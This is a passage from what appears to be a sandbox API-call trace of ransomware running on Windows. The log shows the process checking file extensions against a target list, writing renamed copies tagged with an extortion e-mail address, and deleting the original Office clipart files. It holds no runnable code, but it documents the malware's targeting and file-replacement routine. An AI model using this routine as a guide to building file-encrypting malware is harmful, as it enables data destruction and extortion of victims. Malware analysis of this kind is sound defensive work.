Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.524] lstrlenW (lpString=".zip") returned 4 [0062.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.524] lstrlenW (lpString=".rar") returned 4 [0062.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString=".bz2") returned 4 [0062.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString=".7z") returned 3 [0062.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.524] lstrlenW (lpString=".dbf") returned 4 [0062.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.524] lstrlenW (lpString=".1cd") returned 4 [0062.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.524] lstrlenW (lpString=".jpg") returned 4 [0062.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.528] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.528] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.529] GetLastError () returned 0x0 [0062.529] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1384, lpOverlapped=0x0) returned 1 [0062.538] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1390, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.538] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.539] SetEndOfFile (hFile=0x344) returned 1 [0062.539] CloseHandle (hObject=0x344) returned 1 [0062.539] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.539] SetEndOfFile (hFile=0x340) returned 1 [0062.553] CloseHandle (hObject=0x340) returned 1 [0062.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0062.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.554] lstrlenW (lpString=".doc") returned 4 [0062.554] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.554] lstrlenW (lpString=".docx") returned 5 [0062.554] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.554] lstrlenW (lpString=".pdf") returned 4 [0062.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.554] lstrlenW (lpString=".xls") returned 4 [0062.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.554] lstrlenW (lpString=".xlsx") returned 5 [0062.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.554] lstrlenW (lpString=".ppt") returned 4 [0062.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.554] lstrlenW (lpString=".zip") returned 4 [0062.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.554] lstrlenW (lpString=".rar") returned 4 [0062.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.554] lstrlenW (lpString=".bz2") returned 4 [0062.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.554] lstrlenW (lpString=".7z") returned 3 [0062.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.554] lstrlenW (lpString=".dbf") returned 4 [0062.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.555] lstrlenW (lpString=".1cd") returned 4 [0062.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0062.555] lstrlenW (lpString=".jpg") returned 4 [0062.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.563] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.563] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.566] GetLastError () returned 0x0 [0062.566] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1306, lpOverlapped=0x0) returned 1 [0062.608] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1310, lpOverlapped=0x0) returned 1 [0062.609] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.609] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.609] SetEndOfFile (hFile=0x354) returned 1 [0062.609] CloseHandle (hObject=0x354) returned 1 [0062.610] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.610] SetEndOfFile (hFile=0x2c8) returned 1 [0062.611] CloseHandle (hObject=0x2c8) returned 1 [0062.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0062.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.612] lstrlenW (lpString=".doc") returned 4 [0062.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.612] lstrlenW (lpString=".docx") returned 5 [0062.612] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.612] lstrlenW (lpString=".pdf") returned 4 [0062.612] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.612] lstrlenW (lpString=".xls") returned 4 [0062.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.612] lstrlenW (lpString=".xlsx") returned 5 [0062.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.612] lstrlenW (lpString=".ppt") returned 4 [0062.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.612] lstrlenW (lpString=".zip") returned 4 [0062.612] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.613] lstrlenW (lpString=".rar") returned 4 [0062.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.613] lstrlenW (lpString=".bz2") returned 4 [0062.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.613] lstrlenW (lpString=".7z") returned 3 [0062.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.613] lstrlenW (lpString=".dbf") returned 4 [0062.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.613] lstrlenW (lpString=".1cd") returned 4 [0062.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0062.613] lstrlenW (lpString=".jpg") returned 4 [0062.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.838] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.838] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.839] GetLastError () returned 0x0 [0062.839] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4354, lpOverlapped=0x0) returned 1 [0062.851] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4360, lpOverlapped=0x0) returned 1 [0062.852] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.852] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.852] SetEndOfFile (hFile=0x344) returned 1 [0062.852] CloseHandle (hObject=0x344) returned 1 [0062.853] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.853] SetEndOfFile (hFile=0x368) returned 1 [0062.854] CloseHandle (hObject=0x368) returned 1 [0062.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0062.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.855] lstrlenW (lpString=".doc") returned 4 [0062.855] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.855] lstrlenW (lpString=".docx") returned 5 [0062.855] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.855] lstrlenW (lpString=".pdf") returned 4 [0062.855] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.855] lstrlenW (lpString=".xls") returned 4 [0062.855] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.855] lstrlenW (lpString=".xlsx") returned 5 [0062.855] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.855] lstrlenW (lpString=".ppt") returned 4 [0062.855] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.856] lstrlenW (lpString=".zip") returned 4 [0062.856] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.856] lstrlenW (lpString=".rar") returned 4 [0062.856] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.856] lstrlenW (lpString=".bz2") returned 4 [0062.856] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.856] lstrlenW (lpString=".7z") returned 3 [0062.856] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.856] lstrlenW (lpString=".dbf") returned 4 [0062.856] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.856] lstrlenW (lpString=".1cd") returned 4 [0062.856] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0062.856] lstrlenW (lpString=".jpg") returned 4 [0062.856] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.857] GetLastError () returned 0x0 [0062.857] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4124, lpOverlapped=0x0) returned 1 [0062.882] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4130, lpOverlapped=0x0) returned 1 [0062.884] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.884] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.884] SetEndOfFile (hFile=0x344) returned 1 [0062.884] CloseHandle (hObject=0x344) returned 1 [0062.885] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.885] SetEndOfFile (hFile=0x368) returned 1 [0062.886] CloseHandle (hObject=0x368) returned 1 [0062.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0062.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.887] lstrlenW (lpString=".doc") returned 4 [0062.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.887] lstrlenW (lpString=".docx") returned 5 [0062.887] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.887] lstrlenW (lpString=".pdf") returned 4 [0062.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.887] lstrlenW (lpString=".xls") returned 4 [0062.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.887] lstrlenW (lpString=".xlsx") returned 5 [0062.887] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.888] lstrlenW (lpString=".ppt") returned 4 [0062.888] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.888] lstrlenW (lpString=".zip") returned 4 [0062.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.888] lstrlenW (lpString=".rar") returned 4 [0062.888] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.888] lstrlenW (lpString=".bz2") returned 4 [0062.888] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.888] lstrlenW (lpString=".7z") returned 3 [0062.888] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.888] lstrlenW (lpString=".dbf") returned 4 [0062.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.888] lstrlenW (lpString=".1cd") returned 4 [0062.888] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0062.888] lstrlenW (lpString=".jpg") returned 4 [0062.888] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.914] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.914] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.925] GetLastError () returned 0x0 [0062.925] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x687c, lpOverlapped=0x0) returned 1 [0062.954] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x6880, lpOverlapped=0x0) returned 1 [0062.955] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.955] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.955] SetEndOfFile (hFile=0x354) returned 1 [0062.956] CloseHandle (hObject=0x354) returned 1 [0062.957] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.957] SetEndOfFile (hFile=0x2c8) returned 1 [0062.984] CloseHandle (hObject=0x2c8) returned 1 [0062.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.985] lstrlenW (lpString=".doc") returned 4 [0062.985] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString=".docx") returned 5 [0062.985] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.985] lstrlenW (lpString=".pdf") returned 4 [0062.985] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString=".xls") returned 4 [0062.985] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.985] lstrlenW (lpString=".xlsx") returned 5 [0062.985] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.985] lstrlenW (lpString=".ppt") returned 4 [0062.985] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.985] lstrlenW (lpString=".zip") returned 4 [0062.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.985] lstrlenW (lpString=".rar") returned 4 [0062.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString=".bz2") returned 4 [0062.985] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString=".7z") returned 3 [0062.985] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.985] lstrlenW (lpString=".dbf") returned 4 [0062.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.985] lstrlenW (lpString=".1cd") returned 4 [0062.985] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0062.986] lstrlenW (lpString=".jpg") returned 4 [0062.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.986] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.986] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, 